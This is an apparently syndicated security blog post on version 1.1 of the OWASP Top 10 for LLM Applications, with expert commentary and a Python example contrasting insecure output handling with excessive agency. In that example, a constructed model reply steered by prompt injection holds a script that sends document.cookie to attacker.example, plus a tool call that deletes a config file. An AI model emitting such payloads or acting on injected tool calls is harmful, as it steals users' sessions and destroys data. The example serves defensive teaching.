The first revamp of the OWASP Top 10 for LLM Applications has been released. With only minor changes, version 1.1 of the Open Worldwide Application Security Project’s list of key vulnerabilities continues to advance the project team’s goal of bridging the divide between general application security principles and the challenges posed by LLMs.
To build that bridge, OWASP added a visual illustration of the data flow in a typical LLM application, highlighting where each risk can surface. For example, the data flow between an API and an LLM's production services could be exposed to prompt injection or a model denial-of-service attack, while an application's plugins might be insecurely designed or granted more agency than the task requires.
Generative AI is advancing at a breakneck pace. To keep it from breaking your organization’s back, here’s a full rundown on the changes in the OWASP Top 10 for LLMs, a starting point for your dev and app sec teams to get a handle on generative AI.
OWASP has to work fast to keep up with the changes in LLM technology; version 1.0 of the Top 10 for LLMs was released only in August.
Chris Romeo, CEO of the threat modeling company Devici, said the inclusion of the LLM application data flow chart is the most significant change in the new version.
“The data flow provides a reference architecture to help readers understand how LLM systems are assembled. Without that context, it is more challenging to understand how the LLM Top 10 risks fit together.”
—Chris Romeo
OWASP Top 10 for LLM project leader Steve Wilson, also chief product officer of Exabeam, said the language describing the risks, as well as the examples accompanying them, has been cleaned up and clarified.
“Some people were confused about the differences between some of the risks. For example, insecure output handling and excessive agency used some similar examples, although different vulnerabilities were at their core.”
—Steve Wilson
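To make the distinction Wilson draws concrete, here is an added example in Python; it is not code from the OWASP project or from this article. It simulates a model reply that was steered by a prompt injection hidden in retrieved content: the reply text, the tool names, the file paths and the `/srv/app/public/` allowlist are all constructed for the illustration. Insecure output handling (LLM02) is the failure to treat model text as untrusted before it reaches a browser, shell or database; excessive agency (LLM08) is letting the model invoke a destructive capability it never needed, so that a single bad output becomes a bad action.

```python
"""Two distinct OWASP Top 10 for LLM risks side by side (added example).

LLM02 Insecure Output Handling: model output is treated as trusted and handed
to a downstream interpreter (browser, shell, SQL) without encoding/validation.
LLM08 Excessive Agency: the model is granted more capability (tools, scope,
autonomy) than the task needs, so a bad output becomes a bad action.
"""
import html
import json
import os
from typing import Callable, Dict, Optional

# Constructed sample reply: a hidden instruction in a retrieved document told
# the model to append a script tag and to emit a tool call that deletes a file.
MODEL_OUTPUT = (
    'Here is the summary you asked for.'
    '<script>fetch("https://attacker.example/?c="+document.cookie)</script>\n'
    '{"tool": "delete_file", "args": {"path": "/srv/app/config.yml"}}'
)

# --- LLM02: insecure output handling ---------------------------------------

def render_insecure(model_text: str) -> str:
    """Vulnerable: raw model text is interpolated into HTML, so a <script>
    tag the model emitted (or was tricked into emitting) runs in the browser."""
    return f"<div class='answer'>{model_text}</div>"


def render_hardened(model_text: str) -> str:
    """Fixed: treat model output like any untrusted user input and encode it
    for the context it lands in (an HTML element body here)."""
    return f"<div class='answer'>{html.escape(model_text, quote=True)}</div>"


# --- LLM08: excessive agency -----------------------------------------------

def _read_file(path: str) -> str:
    # Stand-in for a real tool; constructed for the example.
    return f"<contents of {path}>"


def _delete_file(path: str) -> str:
    # Stand-in for a destructive tool; constructed for the example.
    return f"deleted {path}"


ALL_TOOLS: Dict[str, Callable[[str], str]] = {
    "read_file": _read_file,
    "delete_file": _delete_file,
}


def parse_tool_call(model_text: str) -> Optional[dict]:
    """Return the last JSON-object line of the reply as a tool call, if any."""
    for line in reversed(model_text.splitlines()):
        line = line.strip()
        if line.startswith("{"):
            try:
                call = json.loads(line)
            except json.JSONDecodeError:
                return None
            if isinstance(call, dict) and "tool" in call:
                return call
    return None


def dispatch_excessive(model_text: str) -> str:
    """Vulnerable: whatever tool and arguments the model names get executed.
    The agent holds every capability the application has, with no policy
    check and no human in the loop."""
    call = parse_tool_call(model_text)
    if call is None:
        return "no tool call"
    return ALL_TOOLS[call["tool"]](**call["args"])


# Least-privilege tool grant for a summarisation agent: read-only, one tree.
READ_ONLY_TOOLS: Dict[str, Callable[[str], str]] = {"read_file": _read_file}
ALLOWED_PREFIX = "/srv/app/public/"   # assumed content root for the example


def dispatch_least_privilege(model_text: str) -> str:
    """Fixed: the agent is granted only the tools the task needs, and the
    arguments are validated against policy before anything runs. A destructive
    tool is simply not in the grant, so the injected call cannot succeed."""
    call = parse_tool_call(model_text)
    if call is None:
        return "no tool call"
    tool = call.get("tool")
    if tool not in READ_ONLY_TOOLS:
        return f"refused: tool '{tool}' not granted to this agent"
    # Normalise before the prefix check so '..' segments cannot escape the root.
    path = os.path.normpath(str(call.get("args", {}).get("path", "")))
    if not path.startswith(ALLOWED_PREFIX):
        return f"refused: path outside {ALLOWED_PREFIX}"
    return READ_ONLY_TOOLS[tool](path)


if __name__ == "__main__":
    print(render_hardened(MODEL_OUTPUT))
    print(dispatch_excessive(MODEL_OUTPUT))
    print(dispatch_least_privilege(MODEL_OUTPUT))
```

Note that the same poisoned reply triggers both failures in the vulnerable functions and neither in the hardened ones: output encoding fixes LLM02 without touching the agent, and narrowing the tool grant fixes LLM08 without touching the renderer, which is why the two belong in separate list entries.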
The new version of the Top 10 for LLMs also increases clarity around the descriptions and manifestations within LLM architectures for prompt injection and insecure output handling. Dan Hopkins, vice president of engineering at the API security testing firm StackHawk, said this move was essential.
“Those tests will prove to be very visible to a user and demand targeted fuzzing at runtime for effective assessment.”
—Dan Hopkins
Version 1.1 is “a significant step in the right direction,” said Hopkins. “It’s great to see version 1.1 placing a strong emphasis on enhancing the clarity and understanding of vulnerabilities within an LLM-based architecture.”
“The dataflow specifically does an amazing job highlighting where vulnerabilities exist in the stack, making it abundantly clear why black-box testing of a running application is essential for secure LLM usage,” he added.
The security community is still learning about the wide range of AI capabilities, and the OWASP Top 10 LLM 1.1 reflects that, observed Priyadharshini Parthasarathy, senior security consultant for application security at Coalfire.
“The new version includes a lot of detailed information on LLM-specific terms such as ‘pre-training data,’ the embedding process, and fine-tuning of data on how the models are being trained. This document also updated the list of scenario examples and references in the prevention and mitigation strategies.”
—Priyadharshini Parthasarathy
The top 10 risks in the latest version of the list remain unchanged from v1.0:
LLM01: Prompt Injection
LLM02: Insecure Output Handling
LLM03: Training Data Poisoning
LLM04: Model Denial of Service
LLM05: Supply Chain Vulnerabilities
LLM06: Sensitive Information Disclosure
LLM07: Insecure Plugin Design
LLM08: Excessive Agency
LLM09: Overreliance
LLM10: Model Theft
Future versions of the OWASP Top 10 for LLMs will need to evolve with the gen AI field itself, security experts note. Devici’s Romeo said that he, for one, wants the document to include threat language for each of the Top 10 items.
“The document contains vulnerability examples today, but threat examples would provide direct input into the threat modeling of LLM applications.”
—Chris Romeo
StackHawk's Hopkins said it would also be valuable for the Top 10 for LLMs to expand its guidance on how to verify that the listed vulnerabilities are actually absent from an application.
“Adding detailed descriptions that highlight app sec techniques and their suitability for mitigating and preventing various vulnerabilities within the context of a sample architecture would be incredibly beneficial.”
—Dan Hopkins
Michael Erlihson, a principal data scientist at the API security company Salt Security, suggested that the vulnerability descriptions in the list should be expanded in a future version. Including mitigation strategies for each vulnerability would also be worthwhile for developers and security teams, he said.
“More detailed descriptions and examples of each listed vulnerability could help practitioners better understand the risks involved.”
—Michael Erlihson
Erlihson also suggested including industry-specific guidance in the list, as well as historical data on the vulnerabilities. “Historical data on how the vulnerabilities have evolved over time could provide insights into emerging threats and trends,” he said.
OWASP Top 10 for LLMs project leader Wilson said OWASP is planning two major deliverables in the near future, as well as additional rigor:
*** This is a Security Bloggers Network syndicated blog from ReversingLabs Blog authored by John P. Mello Jr. Read the original post at: https://www.reversinglabs.com/blog/owasp-top-10-for-llm-updated-to-keep-pace-with-ai